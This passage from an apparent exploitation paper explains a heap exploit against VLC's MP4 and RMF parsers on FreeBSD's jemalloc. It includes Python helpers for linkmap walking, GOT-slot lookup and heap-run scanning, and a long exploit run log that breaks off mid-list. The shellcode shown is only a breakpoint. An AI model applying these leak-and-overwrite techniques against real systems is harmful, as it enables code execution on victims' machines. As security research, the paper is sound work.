|
|
on each call to 'dlopen()'. Each entry holds the name of a library, the
|
|
address it's mapped at and so on. We proceed by leaking 1MB of data
|
|
starting from the address of the first linkmap entry (see the sketch after
this list).
|
|
|
|
5 - Step 4 is repeated until 'libmp4_plugin.so' is detected in the leaked
|
|
data. VLC loads more than 100 libraries; there's no need to locate them
|
|
all. Once we got the MP4 plugin entry, we can figure out where exactly
|
|
it has been loaded.
|
|
|
|
6 - By statically inspecting the MP4 plugin and by using the information
|
|
collected at step 5, we can find the absolute address of its .got. The MP4
|
|
vulnerability is triggered within this .so; consequently the overwrite
|
|
must take place within its local .got.
|
|
|
|
7 - The relocation entries, the string table and the symbol table
|
|
indicated by the .dynamic section of the MP4 plugin can be properly
|
|
combined to figure out what .got entry corresponds to what symbol name. We
|
|
choose to overwrite the .got entry for 'memset()' (more on this later).
|
|
The absolute address of the 'memset()' .got entry is then calculated
|
|
and used as the value that will be written in 'p_moov'.
|
|
|
|
8 - A set of possible addresses for 'p_root' is created by leaking and
|
|
analyzing specific heap regions. This step is further analyzed later.
|
|
|
|
9 - A final MP4 file is created. The MP4 file frees all 'p_root'
|
|
candidates, uses 'chpl' boxes containing the shellcode to force jemalloc
|
|
to give the original 'p_root' region back and lands VLC on the 'unlink()'
|
|
style pointer exchange. The address of 'p_root', which now contains user
|
|
supplied data, is written in the .got entry of 'memset()'.
|
|
|
|
10 - Shellcode is executed, much rejoicing is had ;)
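
Steps 4 and 5 are mostly bookkeeping once the leak works. Below is a
sketch of walking a leaked linkmap snapshot, assuming the classic SVR4
link_map layout that FreeBSD's rtld exposes for debuggers (l_addr, l_name,
l_ld, l_next, l_prev, all 32-bit here); leak() stands for whatever wrapper
drives the RMF trick and hands back a (base_address, bytes) pair:


import struct

def walk_linkmap(leak, lm_addr, wanted=b"libmp4_plugin.so"):
    while lm_addr:
        base, mem = leak(lm_addr, 0x100000)
        l_addr, l_name, l_ld, l_next, l_prev = \
            struct.unpack_from("<5I", mem, lm_addr - base)
        lo = l_name - base
        # assumes the pathname string was captured by the same leak
        name = mem[lo:mem.index(b"\x00", lo)] if 0 <= lo < len(mem) else b"?"
        if wanted in name:
            return name, l_addr          # load address of the plugin
        lm_addr = l_next
    return None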
|
|
|
|
So why did we choose to hook 'memset()'? Turns out that once the MP4 file
|
|
parsing has finished and the 'unlink()' style code has been triggered,
|
|
VLC calls 'MP4_BoxDumpStructure()' to print the layout of the MP4 file
|
|
(this is always done by default; no verbose flags required). Since we
|
|
have corrupted the boxes, 'MP4_BoxDumpStructure()' may access invalid
|
|
memory and thus segfault. To avoid such a side effect, we have to hook
|
|
the first external function call. As shown below, this call corresponds to
|
|
'memset()' which suits us just fine ;)
|
|
|
|
|
|
static void __MP4_BoxDumpStructure(..., MP4_Box_t *p_box, ...)
|
|
{
|
|
MP4_Box_t *p_child;
|
|
|
|
if( !i_level )
|
|
{
|
|
...
|
|
}
|
|
else
|
|
{
|
|
...
|
|
memset(str, ' ', sizeof(str));
|
|
}
|
|
...
|
|
|
|
p_child = p_box->p_first;
|
|
while(p_child)
|
|
{
|
|
__MP4_BoxDumpStructure(..., p_child, ...);
|
|
p_child = p_child->p_next;
|
|
}
|
|
}
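
For completeness, step 7 of the walkthrough above is plain 32-bit ELF
bookkeeping with nothing VLC specific in it; given the raw bytes of the
plugin's .rel.plt, .dynsym and .dynstr (read straight from the .so on
disk), the slot that binds 'memset' falls out of an 8-byte-per-entry scan:


import struct

def got_slot_of(sym, rel_plt, dynsym, dynstr):
    # Elf32_Rel is 8 bytes (r_offset, r_info), Elf32_Sym is 16 bytes and
    # ELF32_R_SYM(r_info) == r_info >> 8; r_offset is the address of the
    # .got slot relative to the shared object's load base
    for off in range(0, len(rel_plt), 8):
        r_offset, r_info = struct.unpack_from("<II", rel_plt, off)
        st_name = struct.unpack_from("<I", dynsym, (r_info >> 8) * 16)[0]
        name = dynstr[st_name:dynstr.index(b"\x00", st_name)]
        if name == sym:
            return r_offset
    return None


Adding the plugin's load address (recovered from the linkmap) to the
returned offset gives the absolute slot address that ends up in 'p_moov'.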
|
|
|
|
|
|
----[ 5.2 - Detecting 'p_root' address candidates
|
|
|
|
At first we thought that this would be the easier part of the exploitation
|
|
process; it turned out that it was actually the most difficult. Our first
|
|
idea was to play an MP4 file several times and then leak memory in the
|
|
hope that certain 'MP4_Box_t' signatures may be present somewhere in the
|
|
heap. Unfortunately, the 64-byte allocations used by the MP4 plugin, are
|
|
later used by the RMF parser thus destroying any useful evidence. After
|
|
long nights and lots of tests, we came up with the following technique
|
|
which turned out to be successful:
|
|
|
|
Briefly, we do the following:
|
|
|
|
1 - We leak 65k of data by overwriting 'i_buffer' and leaving 'p_buffer'
|
|
at its present value. This way we read memory contents starting from
|
|
the address at which the victim 'p_block' is located.
|
|
|
|
2 - As we have already discussed, the 'p_blocks' created by our RMF file
|
|
are 192 bytes long, so, they lie within runs serviced by bin-192. Leaking
|
|
data from where 'p_buffer' points, results in neighboring runs being
|
|
leaked as well.
|
|
|
|
3 - In our jemalloc article we mentioned that (a) runs are PAGE_SIZE
|
|
aligned and (b) run headers start with a pointer to the corresponding
|
|
bin. We analyze the leaked data and try to locate PAGE_SIZE aligned
|
|
addresses that start with something that looks like a bin pointer
|
|
(0x0804yyyy, some bytes after the main binary's .bss section).
|
|
|
|
4 - We leak 65k starting from the binary's .bss section. The bins array
|
|
of the main arena lies somewhere around. We analyze the data and locate
|
|
the address of bin-64.
|
|
|
|
5 - We leak about 7-8MB of commonly used heap regions. Since we now
|
|
know the address of bin-64, we try to locate all runs that start with
|
|
a pointer pointing at it, that is, runs that contain 64-byte regions (see
the sketch after this list).
|
|
|
|
6 - All regions in these runs will be freed by our MP4 file; 'p_root'
|
|
is probably one of them.
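
A sketch of the scan behind steps 3 and 5; PAGE_SIZE and the (base, bytes)
leak interface are assumptions on our side, the heuristic is exactly the
one described above: a page-aligned dword equal to the bin-64 address
marks a run that services 64-byte regions:


import struct

PAGE_SIZE = 4096

def find_runs(leak_base, leak_data, bin64_addr):
    # return the addresses of pages whose first dword is a pointer to
    # bin-64, i.e. runs whose regions our MP4 file should free()
    runs = []
    start = (-leak_base) % PAGE_SIZE      # first page boundary inside the leak
    for off in range(start, len(leak_data) - 3, PAGE_SIZE):
        if struct.unpack_from("<I", leak_data, off)[0] == bin64_addr:
            runs.append(leak_base + off)
    return runs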
|
|
|
|
|
|
--[ 6 - Demonstration
|
|
|
|
An art of exploitation paper serves nothing without the proper show off ;)
|
|
This section was specially prepared to be hard sex for your eyes. We were
|
|
very careful and, in fact, we spent many hours trying to figure out the
|
|
leetest shellcode to use, but we couldn't come up with something more
|
|
perfect than 'int3'.
|
|
|
|
|
|
[hk@lsd ~]$ gdb -q vlc
|
|
Reading symbols from xxx/bin/vlc...done.
|
|
(gdb) run --rc-host 127.0.0.1:8080
|
|
Starting program: xxx/bin/vlc --rc-host 127.0.0.1:8080
|
|
...
|
|
|
|
|
|
Let's run the exploit. The actual output may differ since the logs shown
|
|
below do not correspond to the latest version of our code (oh and by
|
|
the way, we are not fucking Python experts).
|
|
|
|
|
|
[hk@lsd ~]$ python main.py
|
|
usage: main.py <vlc_install_prefix> [<rc_port>]
|
|
[hk@lsd ~]$ python main.py xxx/ 8080
|
|
[~] Forcing VLC to load libmp4_plugin.so
|
|
[~] Playing MP4 file 1 times
|
|
.ok
|
|
[~] .got address for VLC binary is 0x0804ad60
|
|
[~] .got address for MP4 plugin is 0x00025e1c
|
|
[~] Index of memset() in MP4's .got is 35
|
|
[~] Requesing memory leak of .got
|
|
[~] Leaking 65535 bytes 0x0804ad60-0x0805ad5f
|
|
[~] Summary of our memory view
|
|
001 0x0804ad60-0x0805ad4a (65515 bytes)
|
|
[~] Got 65515 bytes of useful data
|
|
[~] Saving .got data in got.bin
|
|
[~] Guessed linkmap address is 0x28088000
|
|
[~] Requesting memory leak of linkmap
|
|
[~] Leaking 4194304 bytes 0x28086000-0x28486000
|
|
[~] Summary of our memory view
|
|
001 0x0804ad60-0x0805ad4a (65515 bytes)
|
|
002 0x28086000-0x28485feb (4194284 bytes)
|
|
[~] Got 4194284 bytes of useful data
|
|
[~] Saving linkmap partial data in linkmap-0x28086000.bin
|
|
001 0x08048000-0x00000000 unknown-0x08048000-0x00000000
|
|
002 0x2808e000-0x2817a084 libc.so.7
|
|
003 0x281a5000-0x281b95b4 libvlc.so.7
|
|
004 0x281bd000-0x28286234 libvlccore.so.4
|
|
005 0x282a7000-0x282e3c14 libdbus-1.so.3
|
|
006 0x282ed000-0x282f0814 librt.so.1
|
|
007 0x282f2000-0x28305a84 libm.so.5
|
|
008 0x2830c000-0x2831d334 libthr.so.3
|
|
009 0x28321000-0x28327d44 libintl.so.9
|
|
010 0x2832a000-0x28343eb4 libiconv.so.3
|
|
011 0x2842c000-0x2842ea84 liboss_plugin.so
|
|
012 0x28430000-0x28431734 libmemcpymmxext_plugin.so
|
|
013 0x28433000-0x284401b4 libaccess_bd_plugin.so
|
|
014 0x28442000-0x28443764 libaccess_mmap_plugin.so
|
|
015 0x28445000-0x28447c64 libfilesystem_plugin.so
|
|
016 0x2844a000-0x2844bc24 libdecomp_plugin.so
|
|
017 0x2844d000-0x2844ebd4 libstream_filter_rar_plugin.so
|
|
018 0x28450000-0x284563e4 libzip_plugin.so
|
|
019 0x28458000-0x28464a04 libz.so.5
|
|
020 0x2846a000-0x2846b244 libstream_filter_record_plugin.so
|
|
021 0x2846d000-0x2847e994 libplaylist_plugin.so
|
|
022 0x28482000-0x28483414 libxml_plugin.so
|
|
023 0x29300000-0x29402fb4 libxml2.so.5
|
|
024 0x28485000-0x2848a9c4 libhotkeys_plugin.so
|
|
025 0x2848d000-0x2848e384 libinhibit_plugin.so
|
|
026 0x28490000-0x28490fb4 libsignals_plugin.so
|
|
027 0x28493000-0x28494bd4 libglobalhotkeys_plugin.so
|
|
028 0x28497000-0x284982c4 libxcb-keysyms.so.1
|
|
029 0x2849a000-0x284af254 libxcb.so.2
|
|
030 0x284b2000-0x284b3754 libXau.so.6
|
|
031 0x284b5000-0x284b7b14 libXdmcp.so.6
|
|
032 0x284ba000-0x284ba574 libpthread-stubs.so.0
|
|
033 0x284bc000-0x284c43f4 liboldrc_plugin.so
|
|
034 0x284c8000-0x284e9da4 libmp4_plugin.so
|
|
[~] MP4 plugin is mmap'ed at 0x284c8000-0x284e9da4
|
|
[~] Absolute .got address for MP4 plugin at 0x284ede1c
|
|
[~] .got address of memset() is 0x284edea8
|
|
[~] .bss address for VLC binary is 0x0804adec
|
|
[~] Searching for bin[] address candidates
|
|
[~] Leaking 131070 bytes from current location
|
|
[~] Got 131050 bytes of useful data
|
|
0x0804c0a0...ok
|
|
[~] Leaking 65535 bytes 0x0804adec-0x0805adeb
|
|
[~] Summary of our memory view
|
|
001 0x0804ad60-0x0805ad4a (65515 bytes)
|
|
002 0x28086000-0x28485feb (4194284 bytes)
|
|
003 0x0804adec-0x0805add6 (65515 bytes)
|
|
[~] Got 65515 bytes of useful data
|
|
[~] bin-64 runcur at 0x2891a000, bin address 0x0804bfd8
|
|
[~] Playing MP4 file 16 times
|
|
................ok
|
|
[~] Leaking 7340032 bytes 0x28700000-0x28e00000
|
|
[~] Summary of our memory view
|
|
001 0x0804ad60-0x0805ad4a (65515 bytes)
|
|
002 0x28086000-0x28485feb (4194284 bytes)
|
|
003 0x0804adec-0x0805add6 (65515 bytes)
|
|
004 0x28700000-0x28dfffeb (7340012 bytes)
|
|
[~] Got 7340012 bytes of useful data
|
|
[~] Trying to locate target runs for bin-64 at 0x0804c0a0
|
|
64byte region run at 0x28912000
|
|
64byte region run at 0x28919000
|
|
64byte region run at 0x2891a000
|
|
64byte region run at 0x28933000
|
|
64byte region run at 0x289fc000
|
|
64byte region run at 0x289fd000
|
|
64byte region run at 0x289fe000
|
|
64byte region run at 0x28b32000
|
|
64byte region run at 0x28b33000
|
|
64byte region run at 0x28b34000
|
|
64byte region run at 0x28b36000
|
|
64byte region run at 0x28b37000
|
|
64byte region run at 0x28b38000
|
|
64byte region run at 0x28b39000
|
|
64byte region run at 0x28b3a000
|
|
64byte region run at 0x28b3b000
|
|
64byte region run at 0x28bac000
|
|
64byte region run at 0x28bad000
|
|
64byte region run at 0x28bae000
|
|
64byte region run at 0x28baf000
|
|
[~] Constructing final MP4 payload
|
|
[~] Will free the following memory regions
|
|
0x28912080...0x289120c0...0x28912100...0x28912140...0x28912180...
|
|
0x289121c0...0x28912200...0x28912240...0x28912280...0x289122c0...
|
|
0x28912300...0x28912340...0x28912380...0x289123c0...0x28912400...
|
|
0x28912440...0x28912480...0x289124c0...0x28912500...0x28912540...
|
|
0x28912580...0x289125c0...0x28912600...0x28912640...0x28912680...
|
|
0x289126c0...0x28912700...0x28912740...0x28912780...0x289127c0...
|
|
0x28912800...0x28912840...0x28912880...0x289128c0...0x28912900...
|
|
0x28912940...0x28912980...0x289129c0...0x28912a00...0x28912a40...
|
|
0x28912a80...0x28912ac0...0x28912b00...0x28912b40...0x28912b80...
|
|
0x28912bc0...0x28912c00...0x28912c40...0x28912c80...0x28912cc0...
|
|
0x28912d00...0x28912d40...0x28912d80...0x28912dc0...0x28912e00...
|
|
0x28912e40...0x28912e80...0x28912ec0...0x28912f00...0x28912f40...
|
|
0x28912f80...0x28912fc0...0x28919080...0x289190c0...0x28919100...
|
|
0x28919140...0x28919180...0x289191c0...0x28919200...0x28919240...
|
|
0x28919280...0x289192c0...0x28919300...0x28919340...0x28919380...
|
|
0x289193c0...0x28919400...0x28919440...0x28919480...0x289194c0...
|
|
0x28919500...0x28919540...0x28919580...0x289195c0...0x28919600...
|
|
0x28919640...0x28919680...0x289196c0...0x28919700...0x28919740...
|
|
0x28919780...0x289197c0...0x28919800...0x28919840...0x28919880...
|
|
0x289198c0...0x28919900...0x28919940...0x28919980...0x289199c0...
|
|
0x28919a00...0x28919a40...0x28919a80...0x28919ac0...0x28919b00...
|
|
0x28919b40...0x28919b80...0x28919bc0...0x28919c00...0x28919c40...
|
|
0x28919c80...0x28919cc0...0x28919d00...0x28919d40...0x28919d80...
|
|
0x28919dc0...0x28919e00...0x28919e40...0x28919e80...0x28919ec0...
|
|
0x28919f00...0x28919f40...0x28919f80...0x28919fc0...0x2891a080...
|
|
0x2891a0c0...0x2891a100...0x2891a140...0x2891a180...0x2891a1c0...
|
|
0x2891a200...0x2891a240...0x2891a280...0x2891a2c0...0x2891a300...
|
|
0x2891a340...0x2891a380...0x2891a3c0...0x2891a400...0x2891a440...
|
|
0x2891a480...0x2891a4c0...0x2891a500...0x2891a540...0x2891a580...
|
|
0x2891a5c0...0x2891a600...0x2891a640...0x2891a680...0x2891a6c0...
|
|
0x2891a700...0x2891a740...0x2891a780...0x2891a7c0...0x2891a800...
|
|
0x2891a840...0x2891a880...0x2891a8c0...0x2891a900...0x2891a940...
|
|
0x2891a980...0x2891a9c0...0x2891aa00...0x2891aa40...0x2891aa80...
|
|
0x2891aac0...0x2891ab00...0x2891ab40...0x2891ab80...0x2891abc0...
|
|
0x2891ac00...0x2891ac40...0x2891ac80...0x2891acc0...0x2891ad00...
|
|
0x2891ad40...0x2891ad80...0x2891adc0...0x2891ae00...0x2891ae40...
|
|
0x2891ae80...0x2891aec0...0x2891af00...0x2891af40...0x2891af80...
|
|
0x2891afc0...0x28933080...0x289330c0...0x28933100...0x28933140...
|
|
0x28933180...0x289331c0...0x28933200...0x28933240...0x28933280...
|
|
0x289332c0...0x28933300...0x28933340...0x28933380...0x289333c0...
|
|
0x28933400...0x28933440...0x28933480...0x289334c0...0x28933500...
|
|
0x28933540...0x28933580...0x289335c0...0x28933600...0x28933640...
|
|
0x28933680...0x289336c0...0x28933700...0x28933740...0x28933780...
|
|
0x289337c0...0x28933800...0x28933840...0x28933880...0x289338c0...
|
|
0x28933900...0x28933940...0x28933980...0x289339c0...0x28933a00...
|
|
0x28933a40...0x28933a80...0x28933ac0...0x28933b00...0x28933b40...
|
|
0x28933b80...0x28933bc0...0x28933c00...0x28933c40...0x28933c80...
|
|
0x28933cc0...0x28933d00...0x28933d40...0x28933d80...0x28933dc0...
|
|
0x28933e00...0x28933e40...0x28933e80...0x28933ec0...0x28933f00...
|
|
0x28933f40...0x28933f80...0x28933fc0...0x289fc080...0x289fc0c0...
|
|
0x289fc100...0x289fc140...0x289fc180...0x289fc1c0...0x289fc200...
|
|
0x289fc240...0x289fc280...0x289fc2c0...0x289fc300...0x289fc340...
|
|
0x289fc380...0x289fc3c0...0x289fc400...0x289fc440...0x289fc480...
|
|
0x289fc4c0...0x289fc500...0x289fc540...0x289fc580...0x289fc5c0...
|
|
0x289fc600...0x289fc640...0x289fc680...0x289fc6c0...0x289fc700...
|
|
0x289fc740...0x289fc780...0x289fc7c0...0x289fc800...0x289fc840...
|
|
0x289fc880...0x289fc8c0...0x289fc900...0x289fc940...0x289fc980...
|
|
0x289fc9c0...0x289fca00...0x289fca40...0x289fca80...0x289fcac0...
|
|
0x289fcb00...0x289fcb40...0x289fcb80...0x289fcbc0...0x289fcc00...
|
|
0x289fcc40...0x289fcc80...0x289fccc0...0x289fcd00...0x289fcd40...
|
|
0x289fcd80...0x289fcdc0...0x289fce00...0x289fce40...0x289fce80...
|
|
0x289fcec0...0x289fcf00...0x289fcf40...0x289fcf80...0x289fcfc0...
|
|
0x289fd080...0x289fd0c0...0x289fd100...0x289fd140...0x289fd180...
|
|
0x289fd3c0...0x289fd400...0x289fd440...0x289fd480...0x289fd4c0...
|
|
0x289fd500...0x289fd540...0x289fd580...0x289fd5c0...0x289fd600...
|
|
0x289fd640...0x289fd680...0x289fd6c0...0x289fd700...0x289fd740...
|
|
0x289fd780...0x289fd7c0...0x289fd800...0x289fd840...0x289fd880...
|
|
0x289fd8c0...0x289fd900...0x289fd940...0x289fd980...0x289fd9c0...
|
|
0x289fda00...0x289fda40...0x289fda80...0x289fdac0...0x289fdb00...
|
|
0x289fdb40...0x289fdb80...0x289fdbc0...0x289fdc00...0x289fdc40...
|
|
0x289fdc80...0x289fdcc0...0x289fdd00...0x289fdd40...0x289fdd80...
|
|
0x289fddc0...0x289fde00...0x289fde40...0x289fde80...0x289fdec0...
|
|
0x289fdf00...0x289fdf40...0x289fdf80...0x289fdfc0...0x289fe080...
|
|
0x289fe0c0...0x289fe100...0x289fe140...0x289fe180...0x289fe1c0...
|
|
0x289fe200...0x289fe240...0x289fe280...0x289fe2c0...0x289fe300...
|
|
0x289fe340...0x289fe380...0x289fe3c0...0x289fe400...0x289fe440...
|
|
0x289fe480...0x289fe4c0...0x289fe500...0x289fe540...0x289fe580...
|
|
0x289fe5c0...0x289fe600...0x289fe640...0x289fe680...0x289fe6c0...
|
|
0x289fe700...0x289fe740...0x289fe780...0x289fe7c0...0x289fe800...
|
|
0x289fe840...0x289fe880...0x289fe8c0...0x289fe900...0x289fe940...
|
|
0x289fe980...0x289fe9c0...0x289fea00...0x289fea40...0x289fea80...
|
|
0x289feac0...0x289feb00...0x289feb40...0x289feb80...0x289febc0...
|
|
0x289fec00...0x289fec40...0x289fec80...0x289fecc0...0x289fed00...
|
|
0x289fed40...0x289fed80...0x289fedc0...0x289fee00...0x289fee40...
|
|
0x289fee80...0x289feec0...0x289fef00...0x289fef40...0x289fef80...
|
|
0x289fefc0...0x28b32080...0x28b320c0...0x28b32100...0x28b32140...
|
|
0x28b32180...0x28b321c0...0x28b32200...0x28b32240...0x28b32280...
|
|
0x28b322c0...0x28b32300...0x28b32340...0x28b32380...0x28b323c0...
|
|
0x28b32400...0x28b32440...0x28b32480...0x28b324c0...0x28b32500...
|
|
0x28b32540...0x28b32580...0x28b325c0...0x28b32600...0x28b32640...
|
|
0x28b32680...0x28b326c0...0x28b32700...0x28b32740...0x28b32780...
|
|
0x28b327c0...0x28b32800...0x28b32840...0x28b32880...0x28b328c0...
|
|
0x28b32900...0x28b32940...0x28b32980...0x28b329c0...0x28b32a00...
|
|
0x28b32a40...0x28b32a80...0x28b32ac0...0x28b32b00...0x28b32b40...
|
|
0x28b32b80...0x28b32bc0...0x28b32c00...0x28b32c40...0x28b32c80...
|
|
0x28b32cc0...0x28b32d00...0x28b32d40...0x28b32d80...0x28b32dc0...
|
|
0x28b32e00...0x28b32e40...0x28b32e80...0x28b32ec0...0x28b32f00...
|
|
0x28b32f40...0x28b32f80...0x28b32fc0...0x28b33080...0x28b330c0...
|
|
0x28b33100...0x28b33140...0x28b33180...0x28b331c0...0x28b33200...
|
|
0x28b33240...0x28b33280...0x28b332c0...0x28b33300...0x28b33340...
|
|
0x28b33380...0x28b333c0...0x28b33400...0x28b33440...0x28b33480...
|
|
0x28b334c0...0x28b33500...0x28b33540...0x28b33580...0x28b335c0...
|
|
0x28b33600...0x28b33640...0x28b33680...0x28b336c0...0x28b33700...
|
|
0x28b33740...0x28b33780...0x28b337c0...0x28b33800...0x28b33840...
|
|
0x28b33880...0x28b338c0...0x28b33900...0x28b33940...0x28b33980...
|
|
0x28b339c0...0x28b33a00...0x28b33a40...0x28b33a80...0x28b33ac0...
|
|
0x28b33b00...0x28b33b40...0x28b33b80...0x28b33bc0...0x28b33c00...
|
|
0x28b33c40...0x28b33c80...0x28b33cc0...0x28b33d00...0x28b33d40...
|
|
0x28b33d80...0x28b33dc0...0x28b33e00...0x28b33e40...0x28b33e80...
|
|
0x28b33ec0...0x28b33f00...0x28b33f40...0x28b33f80...0x28b33fc0...
|
|
0x28b34080...0x28b340c0...0x28b34100...0x28b34140...0x28b34180...
|
|
0x28b341c0...0x28b34200...0x28b34240...0x28b34280...0x28b342c0...
|
|
0x28b34300...0x28b34340...0x28b34380...0x28b343c0...0x28b34400...
|
|
0x28b34440...0x28b34480...0x28b344c0...0x28b34500...0x28b34540...
|
|
0x28b34580...0x28b345c0...0x28b34600...0x28b34640...0x28b34680...
|
|
0x28b346c0...0x28b34700...0x28b34740...0x28b34780...0x28b347c0...
|
|
0x28b34800...0x28b34840...0x28b34880...0x28b348c0...0x28b34900...
|
|
0x28b34940...0x28b34980...0x28b349c0...0x28b34a00...0x28b34a40...
|
|
0x28b34a80...0x28b34ac0...0x28b34b00...0x28b34b40...0x28b34b80...
|
|
0x28b34bc0...0x28b34c00...0x28b34c40...0x28b34c80...0x28b34cc0...
|
|
0x28b34d00...0x28b34d40...0x28b34d80...0x28b34dc0...0x28b34e00...
|
|
0x28b34e40...0x28b34e80...0x28b34ec0...0x28b34f00...0x28b34f40...
|
|
0x28b34f80...0x28b34fc0...0x28b36080...0x28b360c0...0x28b36100...
|
|
0x28b36140...0x28b36180...0x28b361c0...0x28b36200...0x28b36240...
|
|
0x28b36280...0x28b362c0...0x28b36300...0x28b36340...0x28b36380...
|
|
0x28b363c0...0x28b36400...0x28b36440...0x28b36480...0x28b364c0...
|
|
0x28b36500...0x28b36540...0x28b36580...0x28b365c0...0x28b36600...
|
|
0x28b36640...0x28b36680...0x28b366c0...0x28b36700...0x28b36740...
|
|
0x28b36780...0x28b367c0...0x28b36800...0x28b36840...0x28b36880...
|
|
0x28b368c0...0x28b36900...0x28b36940...0x28b36980...0x28b369c0...
|
|
0x28b36a00...0x28b36a40...0x28b36a80...0x28b36ac0...0x28b36b00...
|
|
0x28b36b40...0x28b36b80...0x28b36bc0...0x28b36c00...0x28b36c40...
|
|
0x28b36c80...0x28b36cc0...0x28b36d00...0x28b36d40...0x28b36d80...
|
|
0x28b36dc0...0x28b36e00...0x28b36e40...0x28b36e80...0x28b36ec0...
|
|
0x28b36f00...0x28b36f40...0x28b36f80...0x28b36fc0...0x28b37080...
|
|
0x28b370c0...0x28b37100...0x28b37140...0x28b37180...0x28b371c0...
|
|
0x28b37200...0x28b37240...0x28b37280...0x28b372c0...0x28b37300...
|
|
0x28b37340...0x28b37380...0x28b373c0...0x28b37400...0x28b37440...
|
|
0x28b37480...0x28b374c0...0x28b37500...0x28b37540...0x28b37580...
|
|
0x28b375c0...0x28b37600...0x28b37640...0x28b37680...0x28b376c0...
|
|
0x28b37700...0x28b37740...0x28b37780...0x28b377c0...0x28b37800...
|
|
0x28b37840...0x28b37880...0x28b378c0...0x28b37900...0x28b37940...
|
|
0x28b37980...0x28b379c0...0x28b37a00...0x28b37a40...0x28b37a80...
|
|
0x28b37ac0...0x28b37b00...0x28b37b40...0x28b37b80...0x28b37bc0...
|
|
0x28b37c00...0x28b37c40...0x28b37c80...0x28b37cc0...0x28b37d00...
|
|
0x28b37d40...0x28b37d80...0x28b37dc0...0x28b37e00...0x28b37e40...
|
|
0x28b37e80...0x28b37ec0...0x28b37f00...0x28b37f40...0x28b37f80...
|
|
0x28b37fc0...0x28b38080...0x28b380c0...0x28b38100...0x28b38140...
|
|
0x28b38180...0x28b381c0...0x28b38200...0x28b38240...0x28b38280...
|
|
0x28b382c0...0x28b38300...0x28b38340...0x28b38380...0x28b383c0...
|
|
0x28b38400...0x28b38440...0x28b38480...0x28b384c0...0x28b38500...
|
|
0x28b38540...0x28b38580...0x28b385c0...0x28b38600...0x28b38640...
|
|
0x28b38680...0x28b386c0...0x28b38700...0x28b38740...0x28b38780...
|
|
0x28b387c0...0x28b38800...0x28b38840...0x28b38880...0x28b388c0...
|
|
0x28b38900...0x28b38940...0x28b38980...0x28b389c0...0x28b38a00...
|
|
0x28b38a40...0x28b38a80...0x28b38ac0...0x28b38b00...0x28b38b40...
|
|
0x28b38b80...0x28b38bc0...0x28b38c00...0x28b38c40...0x28b38c80...
|
|
0x28b38cc0...0x28b38d00...0x28b38d40...0x28b38d80...0x28b38dc0...
|
|
0x28b38e00...0x28b38e40...0x28b38e80...0x28b38ec0...0x28b38f00...
|
|
0x28b38f40...0x28b38f80...0x28b38fc0...0x28b39080...0x28b390c0...
|
|
0x28b39100...0x28b39140...0x28b39180...0x28b391c0...0x28b39200...
|
|
0x28b39240...0x28b39280...0x28b392c0...0x28b39300...0x28b39340...
|
|
0x28b39380...0x28b393c0...0x28b39400...0x28b39440...0x28b39480...
|
|
0x28b394c0...0x28b39500...0x28b39540...0x28b39580...0x28b395c0...
|
|
0x28b39600...0x28b39640...0x28b39680...0x28b396c0...0x28b39700...
|
|
0x28b39740...0x28b39780...0x28b397c0...0x28b39800...0x28b39840...
|
|
0x28b39880...0x28b398c0...0x28b39900...0x28b39940...0x28b39980...
|
|
0x28b399c0...0x28b39a00...0x28b39a40...0x28b39a80...0x28b39ac0...
|
|
0x28b39b00...0x28b39b40...0x28b39b80...0x28b39bc0...0x28b39c00...
|
|
0x28b39c40...0x28b39c80...0x28b39cc0...0x28b39d00...0x28b39d40...
|
|
0x28b39d80...0x28b39dc0...0x28b39e00...0x28b39e40...0x28b39e80...
|
|
0x28b39ec0...0x28b39f00...0x28b39f40...0x28b39f80...0x28b39fc0...
|
|
0x28b3a080...0x28b3a0c0...0x28b3a100...0x28b3a140...0x28b3a180...
|
|
0x28b3a1c0...0x28b3a200...0x28b3a240...0x28b3a280...0x28b3a2c0...
|
|
0x28b3a300...0x28b3a340...0x28b3a380...0x28b3a3c0...0x28b3a400...
|
|
0x28b3a440...0x28b3a480...0x28b3a4c0...0x28b3a500...0x28b3a540...
|
|
0x28b3a580...0x28b3a5c0...0x28b3a600...0x28b3a640...0x28b3a680...
|
|
0x28b3a6c0...0x28b3a700...0x28b3a740...0x28b3a780...0x28b3a7c0...
|
|
0x28b3a800...0x28b3a840...0x28b3a880...0x28b3a8c0...0x28b3a900...
|
|
0x28b3a940...0x28b3a980...0x28b3a9c0...0x28b3aa00...0x28b3aa40...
|
|
0x28b3aa80...0x28b3aac0...0x28b3ab00...0x28b3ab40...0x28b3ab80...
|
|
0x28b3abc0...0x28b3ac00...0x28b3ac40...0x28b3ac80...0x28b3acc0...
|
|
0x28b3ad00...0x28b3ad40...0x28b3ad80...0x28b3adc0...0x28b3ae00...
|
|
0x28b3ae40...0x28b3ae80...0x28b3aec0...0x28b3af00...0x28b3af40...
|
|
0x28b3af80...0x28b3afc0...0x28b3b080...0x28b3b0c0...0x28b3b100...
|
|
0x28b3b140...0x28b3b180...0x28b3b1c0...0x28b3b200...0x28b3b240...
|
|
0x28b3b280...0x28b3b2c0...0x28b3b300...0x28b3b340...0x28b3b380...
|
|
0x28b3b3c0...0x28b3b400...0x28b3b440...0x28b3b480...0x28b3b4c0...
|
|
0x28b3b500...0x28b3b540...0x28b3b580...0x28b3b5c0...0x28b3b600...
|
|
0x28b3b640...0x28b3b680...0x28b3b6c0...0x28b3b700...0x28b3b740...
|
|
0x28b3b780...0x28b3b7c0...0x28b3b800...0x28b3b840...0x28b3b880...
|
|
0x28b3b8c0...0x28b3b900...0x28b3b940...0x28b3b980...0x28b3b9c0...
|
|
0x28b3ba00...0x28b3ba40...0x28b3ba80...0x28b3bac0...0x28b3bb00...
|
|
0x28b3bb40...0x28b3bb80...0x28b3bbc0...0x28b3bc00...0x28b3bc40...
|
|
0x28b3bc80...0x28b3bcc0...0x28b3bd00...0x28b3bd40...0x28b3bd80...
|
|
0x28b3bdc0...0x28b3be00...0x28b3be40...0x28b3be80...0x28b3bec0...
|
|
0x28b3bf00...0x28b3bf40...0x28b3bf80...0x28b3bfc0...0x28bac080...
|
|
0x28bac0c0...0x28bac100...0x28bac140...0x28bac180...0x28bac1c0...
|
|
0x28bac200...0x28bac240...0x28bac280...0x28bac2c0...0x28bac300...
|
|
0x28bac340...0x28bac380...0x28bac3c0...0x28bac400...0x28bac440...
|
|
0x28bac480...0x28bac4c0...0x28bac500...0x28bac540...0x28bac580...
|
|
0x28bac5c0...0x28bac600...0x28bac640...0x28bac680...0x28bac6c0...
|
|
0x28bac700...0x28bac740...0x28bac780...0x28bac7c0...0x28bac800...
|
|
0x28bac840...0x28bac880...0x28bac8c0...0x28bac900...0x28bac940...
|
|
